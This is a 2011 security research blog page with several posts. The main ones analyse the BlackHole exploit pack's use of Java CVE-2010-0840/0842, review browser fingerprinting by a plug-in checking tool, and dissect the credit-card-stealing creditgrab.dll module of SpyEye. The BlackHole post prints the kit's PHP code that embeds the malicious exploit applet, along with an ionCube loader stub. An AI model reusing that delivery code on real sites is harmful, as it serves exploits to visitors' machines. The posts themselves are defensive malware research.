Monday, February 21, 2011

Java OBE + BlackHole - Dead Man Rising

BlackHole exploit pack is showing heavy increase in malware infections across web. The interesting fact that BlackHole presents is the use of Java OBE (Open Business Engine) in spreading exploits and successfully loading the malicious executable in the victim machine.

What is OBE?
:"OBE is a flexible, modular, standards-compliant Open Source Java workflow engine. It is fully J2EE compliant, and supports several J2EE application servers, operating systems and databases. It faithfully implements Workflow Management Coalition Open Standards (WfMC), to which it offers a variety of extensions and enhancements. OBE is equally suited to embedded or standalone deployment."

More details can be found here

However, BlackHole is using fully functional Java OBE Toolkit in order to exploit plethora of systems. Our latest analysis unleash this point that Java OBE holds the maximum rate of successfully exploiting the targets. BlackHole exploit pack shows this behavior where Java OBE Toolkit is devastating victim machines at rapid pace than any other exploits.

The exploit served by Java OBE is the CVE-2010-0840 and CVE-2010-0842

As stated by Zero Day Initiative: Authentication is not required to exploit this vulnerability.The specific flaw exists within the code responsible for ensuring proper privileged execution of methods. If an untrusted method in an applet attempts to call a method that requires privileges,Java will walk the call stack and for each entry verify that the method called is defined within a class that has that privilege.

BlackHole exploit pack uses following PHP code to link to the exploit
include_once 'config.php';
echo ' Applet Code="ToolsDemo.class" archive="';
echo $config_url . '/exploits/Java-2010-0842.jar';
echo '" width="0" Height="1"
echo $config_url . '/exploits/Java-2010-0842Helper.php';
echo '">

Th exploit is encodes with PHP IonCube encoder as follows

?php //0035e
if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));$__ln='/ioncube/ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3).(($__oc=='win')?'.dll':'.so');$__oid=$__id=realpath(ini_get('extension_dir'));
$__here.'/';$__i=strlen($__rd);while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}@dl($__ln);}else{die('The file '.__FILE__." is corrupted.\n");}if(function_exists('_il_exec')){return _il_exec();}echo
('Site error: the file '.__FILE__.' requires the ionCube PHP Loader '.basename($__ln).' to be installed by the site administrator.');exit(199);


This exploit can be found in the wild on the World Wide Web. During our analysis, exploit specific stats are checked for the infected domain hosting BlackHole exploit pack. The comparative ratio is presented below

This scenario shows the ease of exploiting Java open engine.In this, only BlackHole exploit pack is analyzed, what about other exploit packs. It seems like Java is becoming the preferred base for exploitation because of platform independent nature.

Saturday, February 19, 2011

BrowserCheck - Malware Driven Retrospective

Recently, we came across the new browser security tool released by QUALYS termed as BrowserCheck . In general, this tool scrutinizes and verifies the state of plug-ins in Mozilla browser. As stated in the information week article "Less-than-current browser and plug-in versions can leave your browsing unnecessarily vulnerable to web-based attacks... and make latest-and-greatest-based web sites harder or impossible to use, but Qualys' free BrowserCheck can help."

Well, in general the tool is designed as a simple version based signature tool. However, the tool uses a PHP based version verifier script that runs on server side. An appropriate XMLHttpRequest is used to send the browser based information which we termed as User Agent Based Fingerprinting (UABF).

Conversely, this technique is used in the wild by all the classes of malware to detect the state of browsers (version, addons, plug-ins etc). Apart from this, malware is served based on the type of version running. A similar plug-in detection script can be compiled using navigator object as

Further, it is also detected that the tool is using JavaScript + XMLHTTPRequest collectively to find the information from client machine. During the course of testing, we conducted a small test in order to scrutinize whether Java applet is loaded in the system or not in order to verify the semantics of tool. Generally, Java plug-in version can be checked by using a simple Java applet as follows

import java.applet.*;
import java.awt.*;
public class JavaVersionDisplayApplet extends Applet
{ private Label m_labVersionVendor;
public JavaVersionDisplayApplet() //constructor
m_labVersionVendor = new Label (" Java Version: " +
" from "+System.getProperty("java.vendor"));

The Java client side environment is not triggered on the test machine which clearly indicates that fingerprinting is done using simple tactics. While running the tool on one of our test bed machines, we found that the data is transferred as

{"Platform":"Microsoft Windows Vista Home Premium Edition, 64-bit Service Pack 2","Browser":"Mozilla Firefox 3.6.13","AgentVer":"","SADllVer":"","InstanceId":"72904d0d-a58e-409d-afa3-922d1c8a71cd","ScanId":"5"},

"ScanResults":[{"Status":"Up To Date","ItemType":"Browser","ItemName":"Mozilla Firefox","FoundVer":"3.6.13","ProductVer":"3.6.13","RequiredVer":"",

{"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Adobe Flash Player","FoundVer":"","InstalledFile":"c:\\windows\\syswow64
\\macromed\\flash \npswf32.dll","ProductVer":"","RequiredVer":"",

{"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Adobe Reader","FoundVer":"","InstalledFile":"c:\\program files
(x86)\\adobe\\reader 10.0\\reader\\browser \\nppdf32.dll","ProductVer":"","RequiredVer":"",

{"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Java Runtime","FoundVer":"1.6.0_22","ProductVer":"1.6.0_22",
"RequiredVer":"1.6.0_24","RecommendedVer":"Latest Version of Java","AddonType":"Plugin","FixInfo":""},

{"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Microsoft Silverlight","FoundVer":"4.0.60129.0","InstalledFile":"c:\\program files (x86)\\microsoft silverlight\\4.0.60129.0\\npctrl.dll","ProductVer":"4.0.60129.0","RequiredVer":"4.0.60129.0",

{"Status":"NA","ItemType":"Browser Extra","ItemName":"Microsoft
Windows Presentation Foundation","FoundVer":"3.5.30729.1","InstalledFile":"",

{"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Microsoft
Windows Media Player","FoundVer":"11.0.6002.18311","InstalledFile":"C:\\Windows\\system32\\wmp.dll","ProductVer":"11.0.6002.18311",

This scan info completely leverages the working stature of the tool. However, the technique is not new but one can notice that signature based tools are still widely used.

The next question is to see the way this tool reacts when a malicious plug-in (having updated version information) is installed in the browser.

Monday, February 14, 2011

HITB Paper - Shared Hosting Infections

HITB issue 5 talks about our paper on "Shared Hosting Malware Infections". FETCH here.

Sunday, February 6, 2011

SpyEye CreditGrab.dll Module - Plugin Analysis

In our last post about SpyEye backend collector, we discussed about the the data transference mechanism in SpyEye botnet framework. SpyEye uses creditgrab.dll in order take care of the data that is stolen from the requisite credit cards from victim machines. However, last time we talked about the source code analysis. In order to support the point, we recently came across the dynamic link libraries for different modules. In this post, we are going to talk about the creditgrab.dll.

The DLL main function is designed as follows

At first part, Credit Grab Module (CGM) is designed to get the bot information with a guid reference. This bot guid is used to keep a track of the infection occur in the victim machine and the requisite credit card information stolen from that machine. The code snippet presented below shows this fact

The function "TakeBotGuid" is used in conjunction with the CGM. In this particular function, bot guid is checked. The "repne scasb" instruction keep on checking the string for NULL terminated value there by decrementing the counter (dec ecx). If the carry ( jnb short loc_1000167D) value (carry=0)is zero, the function jumps to the required address which points to the bot guid "unknown".

The gate collector function TakeGateToCollector is structured as follows

void TakeGateToCollector(LPVOID lpGateFunc);
typedef void (*GATETOCOLLECTOR)(IN PBYTE pbData, IN DWORD dwSize);

The next function that plays a critical role in hijacking the HTTP communication channel is Callback_OnBeforeLoadPage. The code snippet taken from this function is presented below

The function loads the bot guid, URI and data by calling a same sub routine as "sub_10001370", which is an appropriate string checking and terminating routine to scrutinize appropriate parameters passed to the SpyEye function.

The above presented snippet from the code shows the dissection of strings. The "strstr" and "strtok" functions are used together to find similar patterns and separating string from tokens ("&"). Basically, in this function it is used for URL dissection and collection of data from a raw source (i.e. information extraction from raw HTTP content). The XREF structure of the plugin module is traced below

So this post clearly indicates the data collection working of SpyEye bot by analyzing a specific DLL sample.

We will be covering the analysis of other modules (some new ones) in upcoming posts.